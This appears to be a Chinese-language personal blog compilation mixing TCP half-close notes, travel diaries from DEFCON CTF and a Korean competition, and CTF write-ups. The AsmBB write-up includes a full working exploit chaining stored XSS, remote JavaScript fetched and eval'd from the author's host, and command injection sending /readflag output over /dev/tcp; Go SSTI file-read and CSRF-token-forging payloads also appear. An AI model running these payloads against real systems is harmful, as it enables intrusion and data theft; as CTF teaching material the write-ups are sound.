 |          |    |     |    |     |------------> retransmit timeout
 |          |    |     |    |------------------> location of socket in memory
 |          |    |     |-----------------------> socket reference count
 |          |    |-----------------------------> inode
 |          |----------------------------------> unanswered 0-window probes
 |---------------------------------------------> uid

enum {
	TCP_ESTABLISHED = 1,
	TCP_SYN_SENT,  // 2
	TCP_SYN_RECV,  // 3
	TCP_FIN_WAIT1, // 4
	TCP_FIN_WAIT2, // 5
	TCP_TIME_WAIT, // 6
	TCP_CLOSE,     // 7
	TCP_CLOSE_WAIT,// 8
	TCP_LAST_ACK,  // 9
	TCP_LISTEN,    // 10
	TCP_CLOSING,   // 11 /* Now a valid state */
	TCP_NEW_SYN_RECV, // 12

	TCP_MAX_STATES // 13 /* Leave at the end! */
};

要找 half-closed socket client 抓 st == 08 (TCP_CLOSE_WAIT) 和 server 抓 st == 05(TCP_FIN_WAIT2)

kernel 會處理 half-closed timeout，大約兩分鐘，所以調整 net.ipv4.tcp_fin_timeout 就可以了

#define TCP_TIMEWAIT_LEN (60*HZ) /* how long to wait to destroy TIME-WAIT
				  * state, about 60 seconds	*/
#define TCP_FIN_TIMEOUT	TCP_TIMEWAIT_LEN
                                 /* BSD style FIN_WAIT2 deadlock breaker.
				  * It used to be 3min, new value is 60sec,
				  * to combine FIN-WAIT-2 timeout with
				  * TIME-WAIT timer.
				  */
#define TCP_FIN_TIMEOUT_MAX (120 * HZ) /* max TCP_LINGER2 value (two minutes) */

refs
https://www.excentis.com/blog/tcp-half-close-a-cool-feature-that-is-now-broken/
https://linkerd.io/2.14/tasks/debugging-502s/#half-closed-connection-timeouts
https://gist.github.com/adleong/0203b0864af2c29ddb821dd48f339f49

飛機

這次搭乘 United 航空先從台灣到舊金山，再轉機到 Las Vegas，是我飛過最長的班機，起飛時間是台灣早上，於是前一天熬夜到出門，正好可以在飛機上睡眠調時差。長途班機多了一次小點和正餐，正餐的部分很普通，小點是小麵包中間夾起司和雞肉，雞肉冰涼的口感相當爽口，是此次旅途前三好吃的雞肉。

雖然飛機上一路吃吃睡睡，到達舊金山時還是想吃些美國食物，美國物價當即給了我一棒，同行的人點了類似台式橙汁雞柳和炒飯套餐花了 15$，而我點了一捲 BBQ Burrito，原價 15.99$ 加上稅和小費高達 18.37$，隨便吃一餐都要花上超過五百臺幣，不過有趣的是無論什麼樣的菜式價位都大約落在 15~20$，於是可以看到同價位的越南麵包和日式生魚片料理、美國漢堡、12 oz 牛排，實現另類的種族平等。

舊金山飛往 Las Vegas 的班機經過美國本土，不確定是飛行高度低還是無雲的原因，可以相當清楚的看到地表的變化，就像是在玩模擬人生的上帝視角，俯視沙子般大小的豪宅、農田、車流。掠過房屋密集的舊金山、稜角分明適合發生命案的山區、緊鄰沙漠阡陌交通不浪費分毫土地的粗放農業、陡然出現靄靄白雪的山頭、教科書上一圈圈綠綠的農田、無人居的真沙漠、到處是豪宅的沙漠，最後到達賭城。

Planet HollyWood

這次住的飯店是四星級的 Planet HollyWood，據說是有 HollyWood 場景，我只覺得他們的停車場很適合發生槍戰、飛車追逐的戲，沒看到其他場景。我有事先買好遠傳和 T-Mobile 合作的漫遊服務，雖然方案是 60 GB，但是網路爛到載圖都要等個三秒，在一些飯店的中心甚至沒訊號，根本用不完，幸好 PH 的 Wifi 超強，可以撐住這次比賽的流量。 PH 的另一個優點是便宜，就只有這兩個優點，恰巧完美符合一群白嫖贊助商爸爸的 CTFers 需求。各個房間的浴室都沒有鎖，比賽時給遠端參賽用的「總統套房」的連廁所都沒有鎖，工作人員只好在外面掛盤子表示裡頭有人，我只想得到中國會發生這種事。PH 的賭場相對的冷清，沒有電影裡狂熱的賭博喧囂氣息，我隨便找了一臺拉霸機，放入 1$ 拉桿卻無法拉，都改成按按鈕，按下去兩秒後結果就出來，沒有人狂吼致富的喜悅，就是一群有錢人和圓滾滾坐在電子屏幕前不斷的把鈔票投入碎紙機買兩秒的快樂，空虛無比。不過其他家賭場還是有滿滿的人等荷官發牌，是 PH 沒落了。

食物

美國的食物比韓國好吃多了，因為他們的邏輯清晰，就是大份量、高熱量、滿滿蛋白質和油脂，能選擇的只有變成圓滾滾或是巨巨。

吃了三家有名的漢堡：IN-N-OUT、GORDON RAMSAY Burger、Shake Shack。IN-N-OUT 的整體口味是最和諧的，完美的把生菜、番茄、醬汁、起司、牛肉、漢堡融為一體，會有 juicy 感覺，價位比較低，漢堡排比較小塊。Gordon 則是凸顯牛肉的炙烤香氣，除了超大的漢堡排還有一塊超大的酪梨，不過風味都被漢堡排獨佔。Shake Shack 有滿溢的漢堡排，透過起司把所有味道融成一團，滿滿的美式狂野，不如 IN-N-OUT 清爽。 整體來說我喜歡 IN-N-OUT > Shake Shack > GORDON RAMSAY Burger。

值得一提的美食是 Hash House a go go 的酋長炸雞鬆餅旁的配菜烤蔥，一份餐點有兩大塊炸雞和四個鬆餅，我和 splitline 不知情各點一份，然後店員就三不五時來關切我們這桌，深怕我們吃到吐。炸雞只剛好達到不柴的水準，鬆餅中規中矩，幸好有神級配菜烤蔥才有辦法吃完，它酥脆卻不油膩、清爽又富有香氣，完美的解膩。

還有兩個大餐行政組說不要 po 網:D

DEFCON CTF

身為 Web 仔我大多數時間都投入在 Infra 上，和黃老師、海豹、lys、lisa、bookgin 去會場接上網路和服務，賽制共三天，每天比賽時間大概是早上十點到下午六點，有 liveCTF、A&D、KoH。第一天情況還不錯，主辦方 nautilus 經歷去年的大爆炸後，今年的服務都運行穩定，隊友穩穩地佔住前五名。

第二天一早佈機器時忽然無法開機，黃老師和海豹現場拆機維修，趕在開賽前成功把服務架好，超神。

因為第一天晚上忽然傳出會場有可疑的包裹要清場，nautilus 被迫撤離機器，第二天才把機器搬回來，Infra 就開始爆炸。先是限制連線數 20，當時總共有 12 隊三個題目，於是 bookgin 和我就得在現場魔改 attackmanager 來符合主辦方要求，bookgin 找到一些成年老 bug，還有魔改架構讓它可以限制所有題目的連線數，然後直接推上 main 把 main 弄得不要不要的。attackmanager master 有一些詭異的 feature 和奇怪的寫法，它試圖增加效能卻忘記瓶頸永遠是主辦方的 Infra，明年也許可以改寫讓它符合 simple & stupid。

第二天在結束前終於釋出 web 題當回家作業，是一堆 php 老梗爛洞集合，我回飯店後太累就先睡，睡醒後就看到 web 大大們把 exploit 全都寫完了，好內卷 QQ。想想我去角落看看怎麼繞 patch，會需要方便看 patch 的工具，就請 Leko 寫了一套把 patch image 拉下來分析 diff 後送通知的 bot，原本有打算把新檔案打包後上傳到 discord，不過 web 題大多都可以直接 diff 看，就只有再串上簡易 diff 的功能，能夠及時得知 patch 資訊，超棒ㄉ。賽後 non-web 仔開 feature 想要一鍵下載，我才知道原來有其他隊友在用我們的服務，不是我們在自嗨:D

第二天後段一直保持第二名，到第三天才掉到第三，最後第三名。三立【2023 世界駭客大會！台灣聯隊 TWN48 「擊敗中國」 奪第 3 名佳績】，好ㄛ笑死，我根本不知道哪隊是中國人。

後記

DEFCON CTF 和我原先想的不太一樣，沒有蝦趴的燈光和音樂，群眾在臺下像是看電競比賽歡呼，反而只是一個廣大的會場的一小角落，同時有其他各式各樣的有趣攤位和 CTF 同時進行，不時會聽到迷因歌或是一群黑人唱靈歌、戴著反電磁波帽的人、拿個訊號探測器尋寶的人、穿著獸裝的人，而我們是一群不好好享受 DEFCON 的 CTFers 怪咖拿 400$ 的門票坐在小角落搞自閉 :D。希望以後可以有時間參加各式 Village ，享受一年一度的駭客盛會

看完 Starry Skies 好想打靶和去 BlackHat，乖乖存錢QQ

TODO：補圖

初賽

初賽是線上賽，Web 類只有兩題，一題被隊友解了，另一題解不出來，然後就靠隊友拿到第七。奇怪的部分是雖然是國際交流賽但是一堆題目都是韓文，官方解法建議用 OCR 辨認，主辦方不太會用 Discord 的樣子，問問題都沒什麼回應，甚至在比賽結束後整個 server 消失不見，連交流題解都不行。

出國

因為機票有補助就沒特別研究，最後選大韓航空，價格和華航差不多，只是網站設計不是很好，訂完票想改資訊都不知道要怎麼改。

飛機餐是韓式口味，有附一條牙膏狀的辣醬，嚐了味道不錯。隔壁坐了韓國小姐姐，穿著拖鞋抖來抖去，還掉到我這邊，於是我把餐包、水果所有食物都拿來搭配辣醬，讓她感受鳳梨披薩似的冒犯。餐包搭辣醬比奶油好吃很多。

世宗市

下飛機後找到工人小姐姐，工人小姐姐問了我們有沒有採買足夠的食物，我看她手提一大袋零食，就問了 Is that for us? no.

車上工人小姐姐還是分給我們零食，問了就有。

從機場搭了兩小時的接駁車到世宗市，世宗市原本是要成為第二個首都，現在一臉養成失敗的鄉下，不過有很多高大的建築，有些建築連綿數個街區長度。荒涼和都市融合的沒落文明。

住宿地點是個郊區房車露營區，偏僻到最近的超商要開車十分鐘，主辦方有提供接駁到 downtown 解決午晚餐，趁機補充消夜和酒精。工人小姐姐推薦我兩款燒酒，一款酒精高達20%但是完全沒酒精味的甜酒，另一款類似米釀，搭配氣泡水有點像是酒精版可爾必思，兩款都很神。工人小姐姐問我要買什麼酒時一直sojusoju，原本以為是她知道燒酒中文，所以我試著說想要「甜酒」，但是她聽不懂，後來查了一下燒酒的韓文發音就是 soju :D

決賽

決賽分成兩部分，一部分是 CTF，題型沒有 web，由 LJP 和 hexrabbit 負責，另一部分是滲透，我和 Wii 負責這塊，目標是 4/23 前後測試版本的 http://sejong.go.kr 讓一群人當義工  。

滲透目標是真實網站，應該是沒有特別埋洞，站點基本上都是靜態的，有一堆功能都要過登入驗證才能用，但是繞不過登入驗證。在前期檢測花了相當久的時間都沒成果，有嘗試 google hacking 真實網站來找潛在的端點，實際測試大多都不在這個測試版本裡。

翻了好久回去看滲透的評分規則，可以知道他的評分機制蠻微妙，不是一般 bug bounty 的分級，像是檔案上傳被列成最高分 1000 分的漏洞，就把評分列表當成 hint 下去找洞，有多找到 reflected XSS 只值 200 分，還有一個可以上傳檔名、附檔名都不可控的圖片到任一位置，實際上就是個廢洞，我原本不想寫到報告裡（也不知道怎麼寫），Wii 說加減寫寫看，然後就拿到 1000 分，寫就是有分XD

最後沒前十，有一超神隊伍只靠滲透就拿了五六千分，拿到第一名，Wii 賽後請他們寄 writeup，到回國前都沒收到，總覺得他們成功繞過登入驗證，挖到新天地。

前面說免費義工也不太對啦，他們的零食區真的猛，粗估有接近二十款零食，我吃過的就超過十種，體脂都上升了幾趴，還有附早、午餐，參賽禮物是最實用的筆電架還有一盒色鉛筆，一盒單單純純的色鉛筆。

wowpass

現在韓國在推 wowpass，同時有儲值卡和 T-money（交通卡）的功能，大部分商家都接受 wowpass 刷卡，雖然機台設點不是很多的感覺，只在旅館或是車站有見過，不過機台同時滿足換匯（約 41）、儲值、提領剩餘金額，而且有結合 app 查看餘額，後續發展值得關注。

明洞

比賽後接著觀光團，我們入住明洞的 Standford Hotel，鄰近明洞商圈和捷運。

韓元匯率是個很神奇的東西，出遊前有稍微做過研究的人都知道換錢時用美元換比台幣划算，在明洞換比韓國機場划算，韓國機場又遠比台灣換划算。而且差異是可以差到 10%以上，像是我在韓國機場換是 36，明洞換是 42，台灣印象中是 2x 。最神奇的是在明洞走路不到五分鐘的兩個換錢所，就可以存在 40 和 42 兩種匯率，五分鐘就可以現賺 6%。而明洞的換錢所又密集又小間，儼然成了一個產業， 匯率卻又可以存在巨大差異，不禁好奇這是一種什麼特殊理由才能生存的產業？抑或是人類的愚蠢（懶惰）就那麼值錢？

這不合理的存在肯定和灰黑產有關？

這裡的天氣只有分成照得到太陽和照不到太陽，可以連續幾天天氣都是二十初，一天涼到可以穿大衣，一天熱到穿短袖，凌晨時最冷到十度初頭，在世宗露營車那天睡前開冷氣，早上被十度冷醒。

我對韓國一直都沒好感，小學曾去過一次，那時還沒到看韓劇的年齡，覺得宮殿沒什麼好看，這次去前剛看完黑暗榮耀，卻還是對韓國傳統文化沒什麼興趣，蠻意外同團也大多對韓國傳統文化沒興趣，韓國也像是完全放棄宣揚傳統文化，建立韓流新文化來搶攻國際旅客，和日本努力把傳統文化融入食衣住行大相逕庭，走另一條極端路線。

明洞的每間餐廳都一定有一位中國店員，每一間。像是配給制。韓國人的英文只有爛到講數字都有困難，還有好到能口語交流兩種，如果遇到一個韓國人很自信的基哩瓜拉講一堆韓文也不管你聽不聽得懂時，他大概率英文程度是0。值得慶幸的是韓國人對外國人挺友善，英文比想像中糟很多，卻沒比想像中排外。

明洞的小吃店很多，街道上左右各有一排小攤車，攤車明亮乾淨，實際上衛生情況和台灣差不多，有些賣龍蝦的商家就把龍蝦放在一箱看起來是融化的水。小吃沒什麼特色，都是台灣常見的或是 oreo、韓式炒麵，聽同團的說賣魚板的小攤車好吃，我路過了好多天泡在一盆紅通通辣油裡的魚板始終沒買。

明洞有很多超大型耳飾店，玲瑯滿目的耳環把整間店裝飾的亮晶晶，我幾乎把所有地圖找得到的耳飾店都逛過一遍，買了一個耳飾。

韓國路人的顏值沒設想的高，或是韓國人本就不是我的茶，可是餐廳店員是真的帥，帥歐巴

食

一家得過米其林的傳統雪弄湯，評審肯定是沒吃過台南牛肉湯，隨便一家店都比雪弄湯好吃。雪弄湯是把牛骨煮成白白的湯，湯頭清淡到確診，我可以理解這碗湯想呈現的口味，店家都會放一盒鹽巴讓客人自己調味，我挺享受原味的都不加，但是配菜是一碗白飯和泡菜就很莫名其妙了，泡菜會搶走整碗湯的味道，白飯加到清湯還是白飯，當夾泡菜時不小心掉一塊到湯裡，整碗都剩下泡菜味（隊友就發生這慘事...）。一碗三四百價格只給了四片牛肉，還是全熟的！牛肉的品質是會被台南鄉親當廚餘的等級，同價位在韓國卻可以烤豬吃到飽。

韓國的豬肉決不讓人失望，第一天吃荒謬的生肉，價位一人400吃到飽韓式烤肉，豬肉沒有任何的騷味，肉的部位帶油脂卻不油，簡單的幾種調味搭配醬菜讓我一直吃都不膩。有趣的是我們團拆成兩桌，我這一桌是四個普通男生，一桌是一個巨巨、一個女生、一個體重不到50kg的男生、和一個普通男性，然後我們這邊比對面早很多就吃不下。

有一家據說是梨花女子大學生會去的小吃店，店內有賣內臟拼盤還有各種炸物，當時店家在休息時間，比手畫腳一番知道只提供外帶，我就坐在店對面吃，後來店主跑來送我一瓶飲料。炸物價格划算好吃，內臟處理可以體現烤豬國的水準，餐盒內沒任何醬料只有一小包鹽巴，內臟也沒特別醃過，可以品嘗到豬肝好的味道，同時沒有尾韻噁心的腥味，第一次吃到那麼好吃的豬肝。

另一家米其林雞湯一客價位500，有一隻小全雞，湯喝起來像是雞白湯拉麵忘記加醬油，整體還蠻濃厚，卻比在 costco 買的韓國人蔘雞湯還淡好幾個檔次，雞肉我媽煮得比較好吃。

出發前幻想韓國是炸雞國，每天都該來分炸雞，剛好BHC 炸雞總店在飯店旁，點了一份醬油口味和起司口味各500元（和台灣價格差不多，但是同價位在韓國可以烤豬吃到飽...），標榜一份是和2~3人，實際上2人就挺勉強。醬油還算好吃，起司就蠻難吃的，隔天還剩下三分之一沒人想吃直接丟掉。

有天亂逛逛到一家都是本地人的店，一家沒中國店員的店，菜單字間距大到翻譯不出來，老闆指著牆上掛著的報導，圖看起來是煎蛋捲，實際上也是煎蛋捲，我點完後才意識到一盤四百元，肯定不平凡，然後就拿到一盤超他媽比臉大的煎蛋捲，厚度超過五公分，口味是很多層煎蛋疊在一起，會辣，拆解後有八層。吃到快吐終於吃完，拿盤子和圖比發現圖沒有騙人，是接近一比一等比例大小。

韓國的傳統飲食真的蠻難吃又貴，有根本邏輯上的問題，唯三值得稱讚的是豬肉、滿滿的小菜、還有醬蟹。每家餐廳都會附一堆小菜，有次三個人陪我去吃生章魚，四個人就點一盤生章魚（韓國不流行低消？），店家還是上了四道小菜，還有次獨自去吃一家醬蟹，我一人只點了一份醬蟹，店員拿台推車擺了八道小菜，小菜都快佔了半張桌子，我推託不要，最後讓我挑個兩三道吃。醬蟹吃起來像是沾了日式醬油的生干貝，雖然醃漬放很久卻沒有海鮮的腥味，相當的清甜，可是畢竟是和潮汕毒藥同級別的毒，搭回國那天才有時間嘗試，沒有同團敢冒著拉肚子上不了飛機的風險，最後只有我自己去吃，很可惜。

然後斷尾了，和旅伴發生的好多趣事不宜寫在這，可是 fb 又不適合加圖。如果要想個理由再來到韓國，肯定是因為和這群人玩＆打比賽、醬蟹、烤豬。

Web

true_web_assembly

asmbb 是個用 FASM 寫的 forum，這題目標是要 XSS admin 來觸發 RCE。admin bot 有限制 domain 在目標下，只能控 URL Path 部分。這裡拆成兩塊來講：1. 身為 admin 如何觸發 RCE 2.如何觸發 XSS 來讓 admin 觸發 RCE

Part 1. 身為 admin 如何觸發 RCE

既然是用 asm 寫的，要 RCE 就從 stdcall 下去找最快，FASM 有點類似打包好一點功能有預處裡機制的 asm （jwang: 那幹嘛不直接寫 C）搜了一下 exec, system, int 0x80 之類的可以知道 FASM 是透過 stdcall 做呼叫，查到 stdcall exec2 往上追可以看到和 smtp 相關，對應到 admin 才能看到的 forum settings

其中的 Pipe the emails through 欄位對應到 asm 裡的 smtp_exec ，如果開啟 Confirm by email ，使用者在註冊時會需要收認證信，就會呼叫 smtp_exec 處理。 stdcall exec2 在處理 smtp_exec 時是用空格來切割參數，不認單雙引號等等， 並且環境裡沒有 nc、curl、wget 等等，所以我們用 bash 來送封包，送往 bash 的 payload 透過 $IFS 分割

/usr/bin/bash -c /readflag$IFS>/dev/tcp/blog.cjis.ooo/8788

Part 2. 如何觸發 XSS 來讓 admin 觸發 RCE

這裡我們採到一個坑，該論壇有 chat 功能，透過 burpsuite proxy 來瀏覽時會壞掉，流量消失

正常要像下圖

chat room 是透過 SSE（server-sent-event）來達到即時推送的功能，接受 event 後再 render 到 chat board 上

在 id=249 可以看到 originalname 出現奇怪的 utf-8 representation，ginoah 當初是先測試可以註冊帶 \ 的 username 會讓 chat board 壞掉，然後發現他會把整串當成 json string 處理，並且不會跳脫 \ 。進一步可以追到 server 在處理 originalname 時沒呼叫 StrEncodeJS 等等 encode function，就直接做拼接

...
        cinvoke sqliteColumnText, [.stmt], 2
        test    eax, eax
        jz      @f
        stdcall StrEncodeJS, eax
        stdcall StrCat, edi, eax
        stdcall StrDel, eax
@@:
        stdcall StrCat, edi, txt '", "originalname": "'

        cinvoke sqliteColumnText, [.stmt], 3
        stdcall StrCat, edi, eax
        stdcall StrCat, edi, txt '", "text": "'
        cinvoke sqliteColumnText, [.stmt], 4
        stdcall StrEncodeJS, eax
        stdcall StrCat, edi, eax
        stdcall StrDel, eax
        stdcall StrCat, edi, txt '" }'
...

所以整個利用流程是

1. 註冊 username 為 XSS payload 的 user
2. 用該 user 發送訊息到 chat room
3. 請 admin 瀏覽 /!chat 開啟驗證信功能和寫入惡意 smtp_exec
4. 再次註冊需要信箱的 user 或是更改現有 user 的 email 來觸發 smtp_exec

asmbb 在一些重要功能會用 ticket 保護（==CSRF Token），在各頁面行為有點差異，此外這題有負責開獨立的 instance 的 instancer 服務和 admin bot ，題目機和 local 行為差蠻多，asmBB 自身還有帶檢測 bot 功能，錯誤訊息還很隨興，在寫腳本時有夠難 debug，雖然賽中和 ginoah 已經想出解答但是手速不夠快，賽後大概四小時才寫完全自動化 exploit QQ

import requests
import re
import base64
import sys
from pwn import *
from threading import Thread
import os
import subprocess

r = remote("162.55.216.146", 9032)
l = r.recvline().decode()
test = re.search(r'unhex\("(.+?)"', l)[1]
proof = subprocess.Popen(
    ["./pow-solver", "20", test], stdout=subprocess.PIPE
).stdout.read()
r.send(proof)
l = r.recvuntil(b"Please stay connected").decode()
h = re.search(r"running at http://(.+?) u", l)[1]
u = re.search(r"Username: (.+?)\n", l)[1]
p = re.search(r"Password: (.+?)\n", l)[1]
host = f"http://{u}:{p}@{h}"
print(f"{host=}")

xss = f'"><img src=a onerror="fetch(`http://c.cjis.ooo:7122/`).then(r=>r.text()).then(r=>eval(atob(r)))"><"'
# xss = f'"><img src=a onerror="fetch(`https://static.cjis.ooo/p.txt`).then(r=>r.text()).then(r=>eval(atob(r)))"><"'
xss = (
    xss.replace('"', "\\u0022")
    .replace(">", "\\u003e")
    .replace("<", "\\u003c")
    .replace("'", "\\u0027")
    .replace("&", "\\u0026")
)


def serve_payload():
    js = f"""
  fetch('http://{h}/!settings')
    .then(r=>r.text())
    .then(r=>{{
      i=r.search('ticket');
      fetch('http://{h}/!settings',
        {{
          method:'POST',
          body:'ticket='+r.substring(i+15,i+47)+
            '&smtp_exec=%2Fusr%2Fbin%2Fbash+-c+%2Freadflag%24IFS>%2Fdev%2Ftcp%2Fc.cjis.ooo%2F1337'+
            '&forum_title=&forum_header=%3Ch1+style%3D%22font-weight%3A+800%22%3EAsmBB%3C%2Fh1%3E%0D%0A%3Cb+style%3D%22text-align%3A+center%22%3EPower%3Cbr%3E%0D%0A%3Csvg+version%3D%221.1%22+width%3D%2264%22+height%3D%2216%22+viewBox%3D%220+0+64+16%22+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0D%0A+%3Cpath+d%3D%22m0+6+8+10h34l-6-6+28-2-50-8+8+8z%22%2F%3E%0D%0A%3C%2Fsvg%3E%0D%0A%3C%2Fb%3E%0D%0A&description=&keywords=&tabselector=1&host=localhost&smtp_addr=localhost&smtp_port=25&smtp_user=a&email_confirm=on&user_perm=1&user_perm=2&user_perm=4&user_perm=8&user_perm=16&user_perm=64&user_perm=256&user_perm=512&user_perm=1024&post_interval=0&post_interval_inc=0&max_post_length=0&anon_perm=1&anon_perm=2&activate_min_interval=0&default_lang=0&page_length=20&default_skin=Urban+Sunrise&default_mobile_skin=Urban+Sunrise&chat_enabled=on&markups=1&password=&save=Save',
          headers:{{
            'content-type':'application/x-www-form-urlencoded'
          }}
        }}
      )
  }});
  """
    js = re.sub(r"[\t \r\n]", "", js)
    payload = base64.b64encode(js.encode()).decode()
    from flask import Flask, make_response

    app = Flask(__name__)

    @app.route("/")
    def a():
        resp = make_response(payload)
        resp.headers["Access-Control-Allow-Origin"] = "*"
        return resp

    app.run("0.0.0.0", 7122)


def do_xss():
    s = requests.session()
    resp = s.get(f"{host}/!register")
    i = resp.text.find("ticket")
    ticket = resp.text[i - 40 : i - 8]
    resp = s.post(
        f"{host}/!register",
        data={
            "username": xss,
            "password": "1" * 8,
            "password2": "1" * 8,
            "ticket": ticket,
            "submit.x": "10310",
            "submit.y": "5",
        },
    )
    print(f"{ticket=}")

    print("[*] regist another user aaaaa")
    resp = s.get(f"{host}/!register")
    i = resp.text.find("ticket")
    ticket = resp.text[i - 40 : i - 8]
    resp = s.post(
        f"{host}/!register",
        data={
            "username": "aaaaa",
            "password": "1" * 8,
            "password2": "1" * 8,
            "ticket": ticket,
            "submit.x": "10310",
            "submit.y": "5",
        },
    )
    print(f"{ticket=}")

    resp = s.get(f"{host}/!login")
    i = resp.text.find("ticket")
    ticket = resp.text[i - 40 : i - 8]
    resp = s.post(
        f"{host}/!login",
        data={
            "username": xss,
            "password": "1" * 8,
            "backlink": "/",
            "ticket": ticket,
            "submit.x": "10321",
            "submit.y": "1",
        },
    )
    print(f"{ticket=}")

    resp = s.post(
        f"{host}/!chat?session=", data={"cmd": "message", "chat_message": "a"}
    )
    if "OK" in resp.text:
        print("[*] XSS Done")
    else:
        print("[*] XSS Failed")
        print(resp.text.encode())


def do_trigger():
    import time

    s = requests.session()

    print("[*] login aaaaa to trigger rce")
    resp = s.get(f"{host}/!login")
    i = resp.text.find("ticket")
    ticket = resp.text[i - 40 : i - 8]
    resp = s.post(
        f"{host}/!login",
        data={
            "username": "aaaaa",
            "password": "1" * 8,
            "backlink": "/",
            "ticket": ticket,
            "submit.x": "10321",
            "submit.y": "1",
        },
    )

    print("[*] changeemail!")
    resp = s.get(f"{host}/!userinfo/aaaaa")
    i = resp.text.find("ticket")
    ticket = resp.text[i + 15 : i + 47]
    resp = s.post(
        f"{host}/!changemail",
        data={
            "password": "1" * 8,
            "email": "aaa@bbb",
            "changeemail": "Change email",
            "ticket": ticket,
        },
    )
    if "Check your mail" not in resp.text:
        print("[*] Failed change email: " + resp.text[:100])
        print(f"{ticket=}")
    else:
        print("[*] rce triggered!")


t1 = Thread(target=serve_payload)
t1.daemon = 1
t1.start()

do_xss()

print("[*]  submit !chat to bot")
bot = remote("162.55.216.146", 9762)
bot.recvuntil(b"Please give instance username: ")
bot.sendline(u.encode())
bot.recvuntil(b"Please give instance password: ")
bot.sendline(p.encode())
bot.recvuntil(b"Please give instance port: ")
bot.sendline(h.split(":")[1].encode())
bot.recvuntil(f"http://{h}/".encode())
bot.sendline(b"!chat")
print(bot.recvall().decode())
bot.close()
print("[*] Try to trigger rce")
l = listen(1337)

do_trigger()

l.interactive()

ginoah 要開始寫 blog 了沒

sqlite_web

ref: ginoah & official writeup

這題用上 werkzeug 的 temp file 機制，超過 500kB 會寫檔，再透過 SQLite load_extension 觸發 RCE，這裡檔案直接透過 /proc/self/fd/xx 存取。

題目都相當好玩，唯一缺點是時間太少來不及看

Web

Admin Dashboard

題目需要得到 admin 權限來瀏覽 index 獲得 flag。有個登入後可以 report 的功能，還有一個受 CSRF Token 保護的 addadmin 頁面可以將帳號提升為 admin

<?php
	if(isset($_POST['url'])){
    	if (filter_var($_POST['url'], FILTER_VALIDATE_URL) && preg_match("^http(s)?^",parse_url($_POST['url'], PHP_URL_SCHEME))) {
        	$return_value = 1;
        	system("node /bot/bot.js ".urlencode($_POST['url']),$return_value);
...

report.php 的 system 裡可以錯誤回顯造成 XSS，開個 socket server 隨便傳個東西讓 HTTP Response 解析壞掉即可

	Error: net::ERR_INVALID_HTTP_RESPONSE at http://c.cjis.ooo:8788/asd
    at navigate (/bot/node_modules/puppeteer-core/lib/cjs/puppeteer/common/Frame.js:240:23)
    at processTicksAndRejections (internal/process/task_queues.js:95:5)
    at async Frame.goto (/bot/node_modules/puppeteer-core/lib/cjs/puppeteer/common/Frame.js:206:21)
    at async CDPPage.goto (/bot/node_modules/puppeteer-core/lib/cjs/puppeteer/common/Page.js:439:16)

flag 位於 admin 登入後的首頁，以前使用多個 iframe 登入不同帳號造成 XSS 再跨 iframe 讀取的打法已經失效，現在 chrome 預設 cookie SameSite 為 lax，但是 iframe 只能寫入 none 屬性的 cookie，一個 rabbit hole。

只能乖乖破解 CSRF Token，生產方式大概如下

# u1,u2 透過自行註冊的兩個 username 轉換，為已知
# a,c 未知
# sx1,sx2 是 csrf token
# M 模數 固定已知，以下都是模運算
a*u1+c = sx1
a*u2+c = sx2
a = (sx2-sx1)/(u2-u1)
c = sx1-(a*u1)

剛好 addadmin 頁面的 username、CSRF Token 透過 $_REQUEST 拿取，提交 http://localhost/addadmin?username=cjiso&password=7122&csrf-token=1fe69abb084e42434627a84405d722e0

即可 ， flag ACSC{C$rF_15_3VerYwh3Re!}

easySSTI

一個可以傳入任意 template 的 Golang SSTI，回傳內容需要繞過 WAF

    if (/ACSC\{.*\}/.test(data)) {
      return reply.code(403).send("??")
    }

Golang Template 可以通過當前  . 來存取其他屬性，並且可以把屬性當作函式呼叫，這題就翻翻 source code 找利用鏈，個人感覺 Golang 相對其他語言好找，沒有一堆奇怪的 magic。翻閱 echo source code 可以找到一條 .Echo.Filesystem.Open 打開 flag ，接著在 $x.Read 卡很久，因為參數需要 []byte 的變數，雖然可以宣告變數和使用部分函式，但是生成任意型態變數就相當困難，這部分也許是可以深入研究的點。最後是想起題目 context 本身有宣告 template 作為 buffer  剛好可以拿來用，再搭配 slice 去頭。

{{$y := .Get "template" }}{{ $x := .Echo.Filesystem.Open "/flag"}}  {{$x.Read $y}} {{slice $y 1 40 | .HTMLBlob 200}}

flag ACSC{h0w_did_y0u_leak_me}

題外話，我研究了好久還是不知道怎麼直接把函式回傳值做為參數，先存一下 🍁 的 payload ，神奇語法

{{ (.Echo.Filesystem.Open "/flag").Read (.Get "template") }} {{ .Get "template" }}

A parenthesized instance of one the above, for grouping. The result may be accessed by a field or map key invocation. print (.F1 arg1) (.F2 arg2) (.StructValuedMethod "arg").Field

Gotion

賽中沒解出來，看他給的題示大致猜到要透過 Nginx Byte-Range Caching 把預設給的 mp4 檔案弄出一個合法的 XSS payload，但是在 Qtime 快冷死又快日出，看了半天想不出怎麼 cache poisoning QQ

蠻有趣的題目待研究 TODO

10av 🍊

賽中沒解出來，掃過去有開一堆奇怪的防毒和郵件服務，看起來一臉上傳檔案戳服務達到 RCE，但是來不及看文檔QQ

Crypto

Merkle Hellman

題目就是 Merkle–Hellman knapsack cryptosystem ，直接給 public key、private key、ciphertext、mod number，依照 wiki 的解密法應該能解，但是我數學不好感覺實作有點麻煩，後來想到一次一個 byte 暴力破解  

#!/usr/bin/env python3
import random
import binascii


b = [7352, 2356, 7579, 19235, 1944, 14029, 1084]
w = [184, 332, 713, 1255, 2688, 5243, 10448]
q = 20910

r = 0
for i in range(1, 20910):
    found = True
    for j in range(7):
        if w[j] * i % q != b[j]:
            found = False
            break
    if found:
        r = i
print(f"{r=}")
# Encrypting
flag = [
    8436,
    22465,
    30044,
    22465,
    51635,
    10380,
    11879,
    50551,
    35250,
    51223,
    14931,
    25048,
    7352,
    50551,
    37606,
    39550,
]
c = []
for f in flag:
    found = False
    for j in range(256):
        s = 0
        for i in range(7):
            if j & (64 >> i):
                s += b[i]
        print(f"{s=}")
        if s == f:
            found = True
            print(f"found: {chr(j)}")
            c.append(chr(j))
            print(c)
            break
    if not found:
        print("fail")
        break
print("".join(c))
# Public Key = [7352, 2356, 7579, 19235, 1944, 14029, 1084]
# Private Key = ([184, 332, 713, 1255, 2688, 5243, 10448], 20910)
# Ciphertext = [8436, 22465, 30044, 22465, 51635, 10380, 11879, 50551, 35250, 51223, 14931, 25048, 7352, 50551, 37606, 39550]
# ACSC{E4zY_P3@zy}

Reverse

serverless

這題就慢慢解 javascript 混淆，然後看懂他在做 RSA 加密

有個要看好一陣子的是這個做快速冪的函式

